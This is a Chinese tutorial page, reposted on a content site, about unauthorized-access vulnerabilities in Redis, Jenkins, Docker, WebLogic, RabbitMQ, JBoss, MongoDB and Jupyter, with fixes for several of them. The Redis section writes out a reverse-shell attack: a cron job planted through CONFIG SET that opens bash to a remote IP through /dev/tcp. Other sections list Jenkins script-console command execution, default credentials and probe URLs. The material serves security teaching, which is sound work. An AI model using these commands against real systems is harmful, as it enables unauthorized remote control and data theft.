Web漏洞-未授权访问漏洞

这篇具有很好参考价值的文章主要介绍了Web漏洞-未授权访问漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

未授权访问漏洞

漏洞介绍:

未授权访问漏洞就是在不需要请求授权的情况下对需要授权的功能进行访问执行,通常是由于认证页面存在缺陷,安全配置不当。

漏洞原理:

未授权访问是系统对用户的限制不全,或者无限制,可以让用户或者限制访问的用户,访问到内部的敏感信息,执行权限之外的功能。

越权漏洞:

水平越权:水平越权是同等权限下,不同用户直接的切换,访问到对方的敏感信息,造成信息泄露。

垂直越权:垂直越权是在低权限用户下,可以执行高权限用户的功能。

漏洞危害:

未授权访问通常会造成以下几点危害:(简要概括)

  1. 泄露用户信息,系统信息

  1. 执行系统命令,操作系统文件,导致系统整体安全遭到破坏

常见的未授权访问漏洞

1、Redis未授权访问漏洞:

redis默认开放6379端口,如果没有采用相关的策略,比如添加防火墙规则来避免非信任来源ip,这样就会将redis服务暴露在公网上,如果默认密码为空的情况下,会导致任意用户在访问目标服务器的情况下未授权访问redis以及读取Redis的数据。

可以利用redis提供的config命令进行文件写操作,还可以将自己的ssh公钥写入目标服务器中,进而使用自己的私钥进行ssh登录目标服务器。

下面介绍一下反弹shell的操作:

redis-cli -h 192.168.56.130
set x "\n* * * * * bash -i >& /dev/tcp/192.168.56.104/7979 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

2、Jenkins未授权访问:

默认情况下,Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可以通过未授权访问漏洞或者暴力破解用户密码,进入脚本执行界面从而获取服务器权限。

操作:

①端口扫描
②直接通过url输入下面地址,若能访问,则证明漏洞存在
http://targetip:8080/manage
http://targetip:8080/script
③命令格式
println 'whoami'.execute().text

修复:

  • 对后台控制页面进行登录验证限制

  • 升级Jenkins至新版本

  • 禁止把Jenkins直接暴露在公网

3、Docker未授权访问

该漏洞是因为docker api可以执行docker命令,该接口的目的是取代docker命令界面,通过url操控docker

操作

①端口扫描
②输入url: http://ip:2375/version 查看是否能访问,若能访问则证明漏洞存在

修复:

  • 对2375端口做网络访问控制,如ACL控制,或访问规则

  • 修改docker swarm的认证方式,使用TLS认证

4、Weblogic未授权访问

Weblogic是J2EE应用服务器,CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证直接访问后台,同时,CVE-2020-14883允许后台任意用户通过http协议执行任意命令

危害:远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管WebLogic Server Console,并执行任意代码

修复:下载补丁程序并安装更新

5、RabbitMQ未授权访问(15672、15692、25672

RabbitMQ是一款消息中间件,可以在发布者和使用者直接交互异步消息

操作:

①端口扫描
②浏览器访问测试,默认密码都是guest
http://ip:15672
http://ip:15692
http://ip:25672

修复:

  • 修改为强密码,删除默认账户

  • 禁止对外网开放,仅限内部访问

6、JBoss未授权访问

JBoss是J2EE应用的中间件平台,默认情况下访问http://ip:8080/jmx-console就可以浏览JBoss部署的管理信息,不需要输入用户名和密码就可以部署上传木马。

操作

①端口扫描
②直接访问http://ip:port/查看是否能进入jmx-console和web-console页面
http://ip:8080/
http://ip:8080/jmx-console/
http://ip:8080/jbossws/

修复

  • 添加JMX控制页面身份认证

  • 进行JMX Console安全配置

  • 关闭jmx-console和web-console

7、MongoDB未授权访问

开启MongoDB服务时不添加任何参数,默认是没有权限验证的,登录用户可以通过默认端口无需密码对数据库进行任意操作

根本原因是:在启动时未设置-auth,很少会有人给数据库添加账号密码

修复

  • 启动认证

  • 设置防火墙策略,限定ip访问服务

  • 限制绑定IP,启动时加入参数--bind_ip 127.0.0.1或在/etc/mongodb.conf文件中添加以下内容:bind_ip = 127.0.0.1;

8、Jupyter Notebook未授权访问

python的交互式笔记本,如果管理员未对其配置密码,将会导致未授权访问漏洞,用户可以创建一个console并执行任意python代码和命令

修复

  • 开启身份认证,防止未经授权用户访问

  • 访问控制策略,限制ip访问,绑定固定ip

9、WordPress未授权访问

CVE-2019-17671文章来源地址https://www.toymoban.com/news/detail-577764.html

到了这里,关于Web漏洞-未授权访问漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [网络安全]一文带你了解SSTI漏洞(结合Web_python_template_injection解题详析)

    SSTI是Server-Side Template Injection的缩写,是一种Web应用程序安全漏洞,主要存在于使用基于模板引擎的Web应用程序中。 SSTI漏洞的主要原因是 在Web应用程序中使用了基于模板引擎的渲染功能,并且没有正确地验证和过滤用户输入的数据。当攻击者能够构造特定的输入并成功地注入

    2024年02月08日
    浏览(37)
  • 网络安全全栈培训笔记(53-WEB攻防-通用漏洞&CRLF注入&URL重定向&资源处理拒绝服务)

    知识点: 1、CRLF注入-原理检测利用 2、URL重定向-原理检测利用 3、Web拒绝服务-原理检测利用 #下节预告: 1、JSONPCORS跨域 2、域名安全接管劫持 #详细点: 1.CRLF注入漏洞,是因为Wb应用没有对用户输入做严格验证,导致攻击者可以输入一些 恶意字符。攻击者一旦向清求行或首部

    2024年01月15日
    浏览(45)
  • Weblogic未授权访问漏洞-CVE-2020-14882&&CVE-2020-14883

    Weblogic未授权访问漏洞-CVE-2020-14882CVE-2020-14883 Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)。 CVE-2020-14882:允许未授权的用户绕过管理控制台的权限验证访问后台 CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令 使用这两个漏洞组成的利用链,可通

    2024年02月16日
    浏览(29)
  • Web 攻防之业务安全:接口未授权访问/调用测试(敏感信息泄露)

    业务安全是指保护业务系统免受安全威胁的措施或手段。 广义 的业务安全应包括业务运行的 软硬件平台 (操作系统、数据库,中间件等)、 业务系统自身 (软件或设备)、 业务所提供的服务安全 ; 狭义 的业务安全指 业务系统自有的软件与服务的安全 。 目录 : 验证码

    2023年04月12日
    浏览(37)
  • 网络安全全栈培训笔记(55-服务攻防-数据库安全&Redis&Hadoop&Mysqla&未授权访问&RCE)

    知识点: 1、服务攻防数据库类型安全 2、RedisHadoopMysql安全 3、Mysql-CVE-2012-2122漏洞 4、Hadoop-配置不当未授权三重奏RCE漏洞 3、Redis-配置不当未授权三重奏RCE两漏洞 #章节内容: 常见服务应用的安全测试: 1、配置不当-未授权访问 2、安全机制特定安全漏洞 3、安全机制弱口令爆

    2024年01月23日
    浏览(36)
  • 网络安全实验——web安全

    目录 实验目的 实验原理 实验内容 实验1 1. 地址栏中执行脚本 2. 对DOM技术的利用 实验2  1.jump1 2.jump2 3.get 4.xss 5.注册bss 6.盗取cookie 7.分析cookie  实验3 一.搭建IIS服务器 二.身份验证和权限设置 三.IP地址和域名限制 四.安全通信 五. 单点登录  实验总结 1. 了解什么是XSS 2. 掌握盗

    2024年02月13日
    浏览(35)
  • 网络安全-Web端安全协议

    大家上网娱乐或办公总是离不开浏览器,也就是从web端访问各个网站,其安全的重要性与其使用的广泛性成正比。本文就web端常见的相关安全协议分享。 SSL(Secure Sockets Layer),安全套接层,它是在传输通信协议(TCP/IP)上实现的一种安全协议,它位于应用层协议之下且独立的

    2024年02月08日
    浏览(34)
  • 网络安全-安全Web网关(SWG)详解

    在当今快速发展的网络环境中,企业面临着越来越多的网络安全挑战。安全Web网关(SWG)作为一种高效的网络安全解决方案,为企业提供了一个安全、可控的网络使用环境。 安全Web网关是一种网络安全设备或服务,主要功能是监控和管理用户的Web访问,以防止恶意软件入侵和

    2024年02月01日
    浏览(40)
  • Web 学习笔记 - 网络安全

    目录 m前言 正文 XSS 攻击 简单示例 XSS 防御 CSRF  Web 安全方面的基本知识是有很必要的,未必就要深入理解。本文主要介绍常见的网络攻击类型,不作深入探讨。 网络攻击的形式种类繁多,从简单的网站敏感文件扫描、弱口令暴力破解,到 SQL 注入,再到复杂的网络劫持等,

    2023年04月24日
    浏览(36)
  • 网络安全——Web目录扫描

    一、Web目录扫描原因 1、发现网站后台管理登录页面,可以尝试发现漏洞,进行爆破 2、寻找未授权页面,有些网站在开发时有一些没有授权的页面,在上线后没有及时清除,可以利用这个弱点进行入侵 3、寻找网站更多隐藏信息 二、Web目录扫描方法 1、robots.txt  例:可以看到

    2024年02月05日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包